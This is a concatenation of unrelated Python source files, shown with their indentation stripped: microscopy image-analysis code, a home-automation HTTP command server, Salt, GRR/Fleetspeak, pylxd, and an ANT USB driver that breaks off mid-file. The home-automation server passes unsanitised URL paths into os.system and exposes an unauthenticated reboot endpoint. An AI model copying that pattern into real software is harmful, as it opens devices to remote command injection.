#segChannelsDir = mainAnalysisDir / positionDir / "oneMMChannelCellSeg" / channelNo
#if not phaseChannelsDir.exists():
# phaseChannelsDir.mkdir(parents=True, exist_ok=True)
#if not segChannelsDir.exists():
# segChannelsDir.mkdir(parents=True, exist_ok=True)
#phaseChannelImg = phase_img[:,
# location - channelWidth: location + channelWidth]
segChannelImg = seg_img[:,
location - channelWidth: location + channelWidth]
# write the image
#phaseChannelFileName = phaseChannelsDir / filename
#segChannelFileName = segChannelsDir / filename
props = regionprops(label(segChannelImg))
areas = []
lengths = []
numobjects = []
for blob_index in range(len(props)):
#if props[i]['area'] > 64 and props[i]['major_axis_length'] < 200:
areas.append(props[blob_index]['area'])
lengths.append(props[blob_index]['major_axis_length'])
numobjects.append(blob_index)
channelPropertiesToDatabase = {
'position': position,
'timepoint': time,
'channelno': i,
'areas': pickle.dumps(areas),
'lengths': pickle.dumps(lengths),
'numobjects': pickle.dumps(numobjects)
}
#io.imsave(phaseChannelFileName, phaseChannelImg.astype('float16'), check_contrast=False, compress = 6, plugin='tifffile')
#io.imsave(segChannelFileName, segChannelImg.astype('uint8'), check_contrast=False, compress=6, plugin='tifffile')
dataToDatabase.append(channelPropertiesToDatabase)
self.recordInDatabase('growth', dataToDatabase)
sys.stdout.write(f"Calculating for position: {datapoint[0]} -- time: {datapoint[1]} -- no of channels: {len(channelLocations)}\n")
sys.stdout.flush()
except Exception as e:
sys.stdout.write(f"Error : {e} in writing files\n")
sys.stdout.flush()
#self.recordInDatabase('growth', properties)
def properties(self):
# properties loop for computing per-channel growth properties from the segmentation results
sys.stdout.write(f"Starting properties analyzer ... \n")
sys.stdout.flush()
# wait for kill event
while not self.writeKillEvent.is_set():
try:
# write the dataloader to get the right stuff into the net
dataloader = DataLoader(self.writeDataset, batch_size=6, num_workers=2)
with torch.no_grad():
for data in dataloader:
#calculateOnePosition(data['position'], data['time'], data['numChannels'])
if data is None:
#time.sleep(5)
continue
else:
# arguments construction for pool execution
positions = list(data['position'].numpy())
times = list(data['time'].numpy())
numOfChannels = list(data['numchannels'].numpy())
arguments = list(zip(positions, times, numOfChannels))
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.calculateOnePosition, arguments)
# start a thread pool to speed up the execution of reading writing properties
sys.stdout.write(f" Write Process: {data}\n")
sys.stdout.flush()
except KeyboardInterrupt:
self.writeKillEvent.set()
sys.stdout.write("Writing process interrupted using keyboard\n")
sys.stdout.flush()
sys.stdout.write("Writing properties process completed successfully\n")
sys.stdout.flush()
# this function will be called for calculating the growth for a position
def growth(self):
pass
# basically start all the experiment processes and run
# until the abort buttons are pressed
def run(self):
self.loadNets()
self.createProcesses()
self.acquireProcess.start()
self.acquireProcess = None # set this to none so that the process context
# doesn't get copied as it is not picklable
self.segmentProcess.start()
def stop(self):
self.acquireKillEvent.set()
self.segmentKillEvent.set()
self.writeKillEvent.set()
# if it fails write the state and bail, and use this state to restart after adjusting
def savedState(self):
pass
def runProcesses(exptRunObject):
#exptRunObject.loadNets()
try:
mp.set_start_method('spawn')
except:
pass
exptRunObject.acquireKillEvent.clear()
acquireProcess = mp.Process(target=exptRunObject.acquire, name='Acquire Process')
acquireProcess.start()
exptRunObject.segmentKillEvent.clear()
segmentProcess = mp.Process(target=exptRunObject.segment, name='Segment Process')
segmentProcess.start()
exptRunObject.writeKillEvent.clear()
writeProcess = mp.Process(target=exptRunObject.properties, name='Properties write Process')
writeProcess.start()
# In the datasets image names are img_000000000.tiff format.
def imgFilenameFromNumber(number):
if number == 0:
num_digits = 1
else:
num_digits = int(math.log10(number)) + 1
imgFilename = 'img_' + '0' * (9 - num_digits) + str(number) + '.tiff'
return imgFilename
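# Equivalent formulation (a sketch, not used elsewhere in this file): the same
# 9-digit zero padding can be produced with str.zfill.
def imgFilenameFromNumberZfill(number):
# e.g. imgFilenameFromNumberZfill(42) -> 'img_000000042.tiff'
return 'img_' + str(number).zfill(9) + '.tiff'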
def findBarcodesAndChannels(peaks, parameters = { 'minChannelLength': 200, 'minPeaksDistance' : 25,
'barcodeWidth' : 48, 'channelsPerBlock': 21, 'plateauSize':15, 'channelWidth': 36}):
#hist = np.sum(image, axis = 0) > parameters['minChannelLength']
#peaks, _ = find_peaks(hist, distance=parameters['minPeaksDistance'], plateau_size=parameters['plateauSize'])
indices_with_larger_gaps = np.where(np.ediff1d(peaks) > parameters['barcodeWidth'])[0]
locations_before_barcode = peaks[indices_with_larger_gaps]
locations_after_barcode = peaks[indices_with_larger_gaps + 1]
locations_barcode = np.rint(np.mean((locations_before_barcode,
locations_after_barcode), axis = 0)).astype('int')
num_barcodes = len(locations_barcode)
# there are 5 barcodes seen in the image
if num_barcodes == 5:
# count the number of channels before the first barcode and after the
# last barcode and include them upto numChannels channels
y_channels = []
# channels before first barcode
indices_before_first = np.where(peaks < locations_barcode[0])[0]
if peaks[indices_before_first[0]] < parameters['channelWidth']//2:
indices_before_first = indices_before_first[1:]
y_channels.extend(list(peaks[indices_before_first]))
for i in range(num_barcodes):
indices = np.where(np.logical_and(peaks > locations_barcode[i-1],
peaks < locations_barcode[i]))[0]
y_channels.extend(list(peaks[indices]))
# number of channels to count after the last
number_to_include = parameters['channelsPerBlock'] - len(indices_before_first)
indices_after_last = np.where(peaks > locations_barcode[-1])[0]
y_channels.extend(list(peaks[indices_after_last][:number_to_include]))
elif num_barcodes == 6:
y_channels = []
# count only the channels between barcodes and
# grab the (x, y) locations to cut,
# x will be the top of the channel, row number
# y will be the peak picked up in the histogram, between the barcodes
# count 21 channels after calculating
for i in range(num_barcodes):
indices = np.where(np.logical_and(peaks > locations_barcode[i-1],
peaks < locations_barcode[i]))[0]
#if len(indices) == 21:
# all good pick them up
y_channels.extend(list(peaks[indices]))
else:
# detection failure; since it is ambiguous, skip the position
y_channels = []
sys.stdout.write(f"Detection failure, {num_barcodes} detected\n")
sys.stdout.flush()
# locations of the barcode and locations of channels to cut.
return locations_barcode, y_channels
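# Hypothetical usage sketch (the peak positions are invented; in the pipeline
# they come from a column-wise histogram of the phase image, as the
# commented-out find_peaks call above indicates):
# peaks = np.array([30, 66, 102, ...])
# barcode_locs, channel_locs = findBarcodesAndChannels(peaks)
# barcode_locs: x positions of the detected barcodes (5 or 6 expected)
# channel_locs: x positions of channels to cut, [] on detection failure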
class tweezerWindow(QMainWindow):
def __init__(self):
pass
if __name__ == "__main__":
print("Experiment Processes launch ...")
# parse the arguments and create appropriate processes and queues
|
simple_cmd_server.py
|
#!/usr/bin/env python
"""
Intended target: OSMC device
"""
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import os
from Speaker.SwitchSpeaker import SwitchSpeaker
from Logging.LogClient import LogClient
from harmony.Harmony import HarmonyClient
from harmony.HarmonyChecker import HarmonyChecker
from Kodi.Kodi import kodi_stop, kodi_start, radio_play
import threading
log = LogClient("simple_cmd_server")
class HttpHandler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
if self.path.startswith('/ab/current_activity'):
self.wfile.write(checker.get_last_activity())
if self.path.startswith('/reboot'):
os.system('reboot')
if self.path.startswith('/light/'):
code = self.path[7:]
cmd = '/usr/bin/codesend %s' % code
os.system(cmd)
self.wfile.write("OK\n")
log.info("cmd: %s" % cmd)
if self.path == '/speaker/internal':
speaker = SwitchSpeaker(log)
speaker.internal()
self.wfile.write("OK\n")
log.info("cmd: internal speaker")
if self.path == '/speaker/external':
speaker = SwitchSpeaker(log)
speaker.external()
self.wfile.write("OK\n")
log.info("cmd: external speaker")
if self.path == '/kodi/stop':
log.info("kodi stop")
kodi_stop()
if self.path == '/kodi/start':
log.info("kodi start")
kodi_start()
if self.path == '/radio/on':
radio_play()
if self.path == '/tv/on':
cmd = 'echo "tx 20:04" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("cmd: tv on")
if self.path == '/tv/off':
cmd = 'echo "tx 20:36" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("cmd: tv off")
if self.path == '/tv/kodi':
cmd = 'echo "tx 2F:82:20:00" | cec-client RPI -s -d 4'
os.system(cmd)
log.info("tv to kodi")
if self.path == '/amp/volume_up':
harmony_client = HarmonyClient('192.168.88.186')
harmony_client.send_amp_command('VolumeUp')
harmony_client.close()
if self.path == '/amp/volume_down':
harmony_client = HarmonyClient('192.168.88.186')
harmony_client.send_amp_command('VolumeDown')
harmony_client.close()
def do_HEAD(self):
self._set_headers()
def do_POST(self):
# Doesn't do anything with posted data
self._set_headers()
self.wfile.write("<html><body><h1>POST not implemented</h1></body></html>")
def run(server_class=HTTPServer, handler_class=HttpHandler, port=9999):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
print ('Starting httpd...')
log.info("Starting simple_cmd_server")
try:
httpd.serve_forever()
except:
pass
def callback(activity):
log.info('Switched activity. New:' + activity)
if activity != 'Music':
speaker = SwitchSpeaker(log)
speaker.internal()
else:
speaker = SwitchSpeaker(log)
speaker.external()
if __name__ == "__main__":
handler = HttpHandler
checker = HarmonyChecker(log, callback)
thread = threading.Thread(target=checker.start)
thread.start()
from sys import argv
if len(argv) == 2:
run(port=int(argv[1]), handler_class=handler)
else:
run()
checker.stop()
#######################
# if self.path == '/tv/on':
# cmd = 'echo "on 0" | cec-client RPI -s -d 4'
# os.system(cmd)
# log.info("cmd: tv on")
#
# if self.path == '/tv/off':
# cmd = 'echo "standby 0" | cec-client -s -m -d 1'
# os.system(cmd)
# log.info("cmd: tv off")
# if self.path == '/tv/hdmi3':
# cmd = 'echo "tx 4F:82:30:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("hdmi3")
#
# if self.path == '/tv/kodi':
# cmd = 'echo "tx 4F:82:20:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("switch to kodi (HDMI 2)")
#
# if self.path == '/tv/hdmi1':
# cmd = 'echo "tx 4F:82:10:00" | cec-client -d 1 -s'
# os.system(cmd)
# log.info("hdmi1")
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''For running command line executables with a timeout'''
from __future__ import absolute_import
import subprocess
import threading
import salt.exceptions
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = self.stdin.replace('\\n', '\n').encode(__salt_system_encoding__)
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except TypeError:
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(str(arg))
else:
str_args.append(arg)
args = str_args
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.is_alive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.is_alive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
str(self.timeout),
)
)
return self.process.returncode
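# Hypothetical usage sketch (assumes a Salt runtime where
# __salt_system_encoding__ is defined; command and timeout are placeholders):
# proc = TimedProc(['sleep', '10'], timeout=2)
# try:
# proc.run()
# except salt.exceptions.TimedProcTimeoutError as exc:
# print(exc)  # roughly: "['sleep', '10'] : Timed out after 2 seconds"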
|
fleetspeak_client.py
|
#!/usr/bin/env python
"""Fleetspeak-facing client related functionality.
This module contains glue code necessary for Fleetspeak and the GRR client
to work together.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
import pdb
import platform
import struct
import threading
import time
from absl import flags
from future.utils import iteritems
from future.utils import itervalues
import queue
from fleetspeak.src.client.daemonservice.client import client as fs_client
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from grr_response_client import comms
from grr_response_core import config
from grr_response_core.lib import communicator
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_proto import jobs_pb2
# pyformat: disable
START_STRING = "Starting client."
# //depot/grr_response_client/comms.py)
# pyformat: enable
# Limit on the total size of GrrMessages to batch into a single
# PackedMessageList (before sending to Fleetspeak).
_MAX_MSG_LIST_BYTES = 1 << 20 # 1 MiB
# Maximum number of GrrMessages to put in one PackedMessageList.
_MAX_MSG_LIST_MSG_COUNT = 100
# Maximum size of annotations to add for a Fleetspeak message.
_MAX_ANNOTATIONS_BYTES = 3 << 10 # 3 KiB
_DATA_IDS_ANNOTATION_KEY = "data_ids"
class FatalError(Exception):
pass
class GRRFleetspeakClient(object):
"""A Fleetspeak enabled client implementation."""
# Only buffer at most ~100MB of data - the estimate comes from the Fleetspeak
# message size limit - Fleetspeak refuses to process messages larger than 2MB.
# This is a sanity safeguard against unlimited memory consumption.
_SENDER_QUEUE_MAXSIZE = 50
def __init__(self):
self._fs = fs_client.FleetspeakConnection(
version=config.CONFIG["Source.version_string"])
self._sender_queue = queue.Queue(
maxsize=GRRFleetspeakClient._SENDER_QUEUE_MAXSIZE)
self._threads = {}
if platform.system() == "Windows":
internal_nanny_monitoring = False
heart_beat_cb = self._fs.Heartbeat
else:
# TODO(amoser): Once the Fleetspeak nanny functionality is
# production ready, change this to
# internal_nanny_monitoring=False
# heart_beat_cb=self._fs.Heartbeat
internal_nanny_monitoring = True
heart_beat_cb = None
# The client worker does all the real work here.
# In particular, we delegate sending messages to Fleetspeak to a separate
# threading.Thread here.
self._threads["Worker"] = comms.GRRClientWorker(
out_queue=_FleetspeakQueueForwarder(self._sender_queue),
heart_beat_cb=heart_beat_cb,
internal_nanny_monitoring=internal_nanny_monitoring,
client=self)
self._threads["Foreman"] = self._CreateThread(self._ForemanOp)
self._threads["Sender"] = self._CreateThread(self._SendOp)
self._threads["Receiver"] = self._CreateThread(self._ReceiveOp)
def _CreateThread(self, loop_op):
thread = threading.Thread(target=self._RunInLoop, args=(loop_op,))
thread.daemon = True
return thread
def _RunInLoop(self, loop_op):
while True:
try:
loop_op()
except Exception as e:
logging.critical("Fatal error occurred:", exc_info=True)
if flags.FLAGS.pdb_post_mortem:
pdb.post_mortem()
# This will terminate execution in the current thread.
raise e
def FleetspeakEnabled(self):
return True
def Run(self):
"""The main run method of the client."""
for thread in itervalues(self._threads):
thread.start()
logging.info(START_STRING)
while True:
dead_threads = [
tn for (tn, t) in iteritems(self._threads) if not t.is_alive()
]
if dead_threads:
raise FatalError(
"These threads are dead: %r. Shutting down..." % dead_threads)
time.sleep(10)
def _ForemanOp(self):
"""Sends Foreman checks periodically."""
period = config.CONFIG["Client.foreman_check_frequency"]
self._threads["Worker"].SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
time.sleep(period)
def _SendMessages(self, grr_msgs, background=False):
"""Sends a block of messages through Fleetspeak."""
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_msgs), message_list)
fs_msg = fs_common_pb2.Message(
message_type="MessageList",
destination=fs_common_pb2.Address(service_name="GRR"),
background=background)
fs_msg.data.Pack(message_list.AsPrimitiveProto())
for grr_msg in grr_msgs:
if (grr_msg.session_id is None or grr_msg.request_id is None or
grr_msg.response_id is None):
continue
# Place all ids in a single annotation, instead of having separate
# annotations for the flow-id, request-id and response-id. This reduces
# overall size of the annotations by half (~60 bytes to ~30 bytes).
annotation = fs_msg.annotations.entries.add()
annotation.key = _DATA_IDS_ANNOTATION_KEY
annotation.value = "%s:%d:%d" % (grr_msg.session_id.Basename(),
grr_msg.request_id, grr_msg.response_id)
if fs_msg.annotations.ByteSize() >= _MAX_ANNOTATIONS_BYTES:
break
try:
sent_bytes = self._fs.Send(fs_msg)
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (write end).")
raise
communicator.GRR_CLIENT_SENT_BYTES.Increment(sent_bytes)
def _SendOp(self):
"""Sends messages through Fleetspeak."""
msg = self._sender_queue.get()
msgs = []
background_msgs = []
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count = 1
size = len(msg.SerializeToBytes())
while count < _MAX_MSG_LIST_MSG_COUNT and size < _MAX_MSG_LIST_BYTES:
try:
msg = self._sender_queue.get(timeout=1)
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count += 1
size += len(msg.SerializeToBytes())
except queue.Empty:
break
if msgs:
self._SendMessages(msgs)
if background_msgs:
self._SendMessages(background_msgs, background=True)
def _ReceiveOp(self):
"""Receives a single message through Fleetspeak."""
try:
fs_msg, received_bytes = self._fs.Recv()
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (read end).")
raise
received_type = fs_msg.data.TypeName()
if not received_type.endswith("grr.GrrMessage"):
raise ValueError(
"Unexpected proto type received through Fleetspeak: %r; expected "
"grr.GrrMessage." % received_type)
communicator.GRR_CLIENT_RECEIVED_BYTES.Increment(received_bytes)
grr_msg = rdf_flows.GrrMessage.FromSerializedBytes(fs_msg.data.value)
# Authentication is ensured by Fleetspeak.
grr_msg.auth_state = jobs_pb2.GrrMessage.AUTHENTICATED
self._threads["Worker"].QueueMessages([grr_msg])
class _FleetspeakQueueForwarder(object):
"""Ducktyped replacement for SizeLimitedQueue; forwards to _SenderThread."""
def __init__(self, sender_queue):
"""Constructor.
Args:
sender_queue: queue.Queue
"""
self._sender_queue = sender_queue
def Put(self, grr_msg, **_):
self._sender_queue.put(grr_msg)
def Get(self):
raise NotImplementedError("This implementation only supports input.")
def Size(self):
"""Returns the *approximate* size of the queue.
See: https://docs.python.org/2/library/queue.html#Queue.Queue.qsize
Returns:
int
"""
return self._sender_queue.qsize()
def Full(self):
return self._sender_queue.full()
|
connection.py
|
# Copyright (c) 2015 Canonical Ltd
# Copyright (c) 2015 Mirantis inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import namedtuple
import copy
import json
import os
import six
import socket
import ssl
import threading
from six.moves import http_client
from six.moves import queue
try:
from ws4py import client as websocket
except ImportError:
websocket = None
from pylxd.deprecated import exceptions
from pylxd.deprecated import utils
if hasattr(ssl, 'SSLContext'):
# For Python >= 2.7.9 and Python 3.x
if hasattr(ssl, 'PROTOCOL_TLSv1_2'):
DEFAULT_TLS_VERSION = ssl.PROTOCOL_TLSv1_2
else:
DEFAULT_TLS_VERSION = ssl.PROTOCOL_TLSv1
else:
# For Python 2.6 and <= 2.7.8
from OpenSSL import SSL
DEFAULT_TLS_VERSION = SSL.TLSv1_2_METHOD
class UnixHTTPConnection(http_client.HTTPConnection):
def __init__(self, path, host='localhost', port=None, strict=None,
timeout=None):
if six.PY3:
http_client.HTTPConnection.__init__(self, host, port=port,
timeout=timeout)
else:
http_client.HTTPConnection.__init__(self, host, port=port,
strict=strict,
timeout=timeout)
self.path = path
def connect(self):
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect(self.path)
self.sock = sock
class HTTPSConnection(http_client.HTTPConnection):
default_port = 8443
def __init__(self, *args, **kwargs):
http_client.HTTPConnection.__init__(self, *args, **kwargs)
def connect(self):
sock = socket.create_connection((self.host, self.port),
self.timeout, self.source_address)
if self._tunnel_host:
self.sock = sock
self._tunnel()
(cert_file, key_file) = self._get_ssl_certs()
self.sock = ssl.wrap_socket(sock, certfile=cert_file,
keyfile=key_file,
ssl_version=DEFAULT_TLS_VERSION)
@staticmethod
def _get_ssl_certs():
return (os.path.join(os.environ['HOME'], '.config/lxc/client.crt'),
os.path.join(os.environ['HOME'], '.config/lxc/client.key'))
_LXDResponse = namedtuple('LXDResponse', ['status', 'body', 'json'])
if websocket is not None:
class WebSocketClient(websocket.WebSocketBaseClient):
def __init__(self, url, protocols=None, extensions=None,
ssl_options=None, headers=None):
"""WebSocket client that executes into a eventlet green thread."""
websocket.WebSocketBaseClient.__init__(self, url, protocols,
extensions,
ssl_options=ssl_options,
headers=headers)
self._th = threading.Thread(
target=self.run, name='WebSocketClient')
self._th.daemon = True
self.messages = queue.Queue()
def handshake_ok(self):
"""Starts the client's thread."""
self._th.start()
def received_message(self, message):
"""Override the base class to store the incoming message."""
self.messages.put(copy.deepcopy(message))
def closed(self, code, reason=None):
# When the connection is closed, put a StopIteration
# on the message queue to signal there's nothing left
# to wait for
self.messages.put(StopIteration)
def receive(self):
# If the websocket was terminated and there are no messages
# left in the queue, return None immediately otherwise the client
# will block forever
if self.terminated and self.messages.empty():
return None
message = self.messages.get()
if message is StopIteration:
return None
return message
class LXDConnection(object):
def __init__(self, host=None, port=8443):
if host:
self.host = host
self.port = port
self.unix_socket = None
else:
if 'LXD_DIR' in os.environ:
self.unix_socket = os.path.join(os.environ['LXD_DIR'],
'unix.socket')
else:
self.unix_socket = '/var/lib/lxd/unix.socket'
self.host, self.port = None, None
self.connection = None
def _request(self, *args, **kwargs):
if self.connection is None:
self.connection = self.get_connection()
self.connection.request(*args, **kwargs)
response = self.connection.getresponse()
status = response.status
raw_body = response.read()
try:
if six.PY3:
body = json.loads(raw_body.decode())
else:
body = json.loads(raw_body)
except ValueError:
body = None
return _LXDResponse(status, raw_body, body)
def get_connection(self):
if self.host:
return HTTPSConnection(self.host, self.port)
return UnixHTTPConnection(self.unix_socket)
def get_object(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.json:
raise exceptions.PyLXDException('Null Data')
elif response.status == 200 or (
response.status == 202 and
response.json.get('status_code') == 100):
return response.status, response.json
else:
utils.get_lxd_error(response.status, response.json)
def get_status(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.json:
raise exceptions.PyLXDException('Null Data')
elif response.json.get('error'):
utils.get_lxd_error(response.status, response.json)
elif response.status == 200 or (
response.status == 202 and
response.json.get('status_code') == 100):
return True
return False
def get_raw(self, *args, **kwargs):
response = self._request(*args, **kwargs)
if not response.body:
raise exceptions.PyLXDException('Null Body')
elif response.status == 200:
return response.body
else:
raise exceptions.PyLXDException('Failed to get raw response')
def get_ws(self, path):
if websocket is None:
raise ValueError(
'This feature requires the optional ws4py library.')
if self.unix_socket:
connection_string = 'ws+unix://%s' % self.unix_socket
else:
connection_string = (
'wss://%(host)s:%(port)s' % {'host': self.host,
'port': self.port}
)
ws = WebSocketClient(connection_string)
ws.resource = path
ws.connect()
return ws
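# Hypothetical usage sketch (the endpoint path follows the LXD REST API; the
# unix socket vs. HTTPS choice depends on how the connection was constructed):
# conn = LXDConnection()  # local unix socket
# status, data = conn.get_object('GET', '/1.0')
# print(status, data.get('metadata', {}))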
|
ant.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import array
import collections
import struct
import threading
import time
import Queue
import logging
import usb.core
import usb.util
from message import Message
from commons import format_list
from driver import find_driver
_logger = logging.getLogger("garmin.ant.base.ant")
class Ant():
_RESET_WAIT = 1
def __init__(self):
self._driver = find_driver()
self._message_queue_cond = threading.Condition()
self._message_queue = collections.deque()
self._events = Queue.Queue()
self._buffer = array.array('B', [])
self._burst_data = array.array('B', [])
self._last_data = array.array('B', [])
self._running = True
self._driver.open()
self._worker_thread = threading.Thread(target=self._worker, name="ant.base")
self._worker_thread.start()
self.reset_system()
def start(self):
self._main()
def stop(self):
if self._running:
_logger.debug("Stoping ant.base")
self._running = False
self._worker_thread.join()
def _on_broadcast(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_BROADCAST, message._data[1:])))
def _on_acknowledge(self, message):
self._events.put(('event', (message._data[0],
Message.Code.EVENT_RX_ACKNOWLEDGED, message._data[1:])))
def _on_burst_data(self, message):
sequence = message._data[0] >> 5
channel = message._data[0] & 0b00011111
data = message._data[1:]
# First sequence
if sequence == 0:
self._burst_data = data
# Other
else:
self._burst_data.extend(data)
# Last sequence (indicated by bit 3)
if sequence & 0b100 != 0:
self._events.put(('event', (channel,
Message.Code.EVENT_RX_BURST_PACKET, self._burst_data)))
def _worker(self):
_logger.debug("Ant runner started")
while self._running:
try:
message = self.read_message()
if message is None:
break
# TODO: flag and extended for broadcast, acknowledge, and burst
# Only do callbacks for new data. Resent data only indicates
# a new channel timeslot.
if not (message._id == Message.ID.BROADCAST_DATA and
message._data == self._last_data):
# Notifications
if message._id in [Message.ID.STARTUP_MESSAGE, \
Message.ID.SERIAL_ERROR_MESSAGE]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (no channel)
elif message._id in [Message.ID.RESPONSE_VERSION, \
Message.ID.RESPONSE_CAPABILITIES, \
Message.ID.RESPONSE_SERIAL_NUMBER]:
self._events.put(('response', (None, message._id,
message._data)))
# Response (channel)
elif message._id in [Message.ID.RESPONSE_CHANNEL_STATUS, \
Message.ID.RESPONSE_CHANNEL_ID]:
self._events.put(('response', (message._data[0],
message._id, message._data[1:])))
# Response (other)
elif (message._id == Message.ID.RESPONSE_CHANNEL \
and message._data[1] != 0x01):
self._events.put(('response', (message._data[0],
message._data[1], message._data[2:])))
# Channel event
elif message._id == Message.ID.BROADCAST_DATA:
self._on_broadcast(message)
elif message._id == Message.ID.ACKNOWLEDGE_DATA:
self._on_acknowledge(message)
elif message._id == Message.ID.BURST_TRANSFER_DATA:
self._on_burst_data(message)
elif message._id == Message.ID.RESPONSE_CHANNEL:
_logger.debug("Got channel event, %r", message)
self._events.put(('event', (message._data[0],
message._data[1], message._data[2:])))
else:
_logger.warning("Got unknown message, %r", message)
else:
_logger.debug("No new data this period")
# Send messages in queue, on indicated time slot
if message._id == Message.ID.BROADCAST_DATA:
time.sleep(0.1)
_logger.debug("Got broadcast data, examine queue to see if we should send anything back")
if self._message_queue_cond.acquire(blocking=False):
while len(self._message_queue) > 0:
m = self._message_queue.popleft()
self.write_message(m)
_logger.debug(" - sent message from queue, %r", m)
if(m._id != Message.ID.BURST_TRANSFER_DATA or \
m._data[0] & 0b10000000):# or m._data[0] == 0):
break
else:
_logger.debug(" - no messages in queue")
self._message_queue_cond.release()
self._last_data = message._data
except usb.USBError as e:
_logger.warning("%s, %r", type(e), e.args)
_logger.debug("Ant runner stopped")
def _main(self):
while self._running:
try:
(event_type, event) = self._events.get(True, 1.0)
self._events.task_done()
(channel, event, data) = event
if event_type == 'response':
self.response_function(channel, event, data)
elif event_type == 'event':
self.channel_event_function(channel, event, data)
else:
_logger.warning("Unknown message typ '%s': %r", event_type, event)
except Queue.Empty as e:
pass
def write_message_timeslot(self, message):
with self._message_queue_cond:
self._message_queue.append(message)
def write_message(self, message):
data = message.get()
self._driver.write(data)
_logger.debug("Write data: %s", format_list(data))
def read_message(self):
while self._running:
# If we have a message in buffer already, return it
if len(self._buffer) >= 5 and len(self._buffer) >= self._buffer[1] + 4:
packet = self._buffer[:self._buffer[1] + 4]
self._buffer = self._buffer[self._buffer[1] + 4:]
return Message.parse(packet)
# Otherwise, read some data and call the function again
else:
data = self._driver.read()
self._buffer.extend(data)
_logger.debug("Read data: %s (now have %s in buffer)",
format_list(data), format_list(self._buffer))
# Ant functions
def unassign_channel(self, channel):
pass
def assign_channel(self, channel, channelType, networkNumber):
message = Message(Message.ID.ASSIGN_CHANNEL, [channel, channelType, networkNumber])
self.write_message(message)
def open_channel(self, channel):
message = Message(Message.ID.OPEN_CHANNEL, [channel])
self.write_message(message)
def set_channel_id(self, channel, deviceNum, deviceType, transmissionType):
data = array.array('B', struct.pack("<BHBB", channel, deviceNum, deviceType, transmissionType))
message = Message(Message.ID.SET_CHANNEL_ID, data)
self.write_message(message)
def set_channel_period(self, channel, messagePeriod):
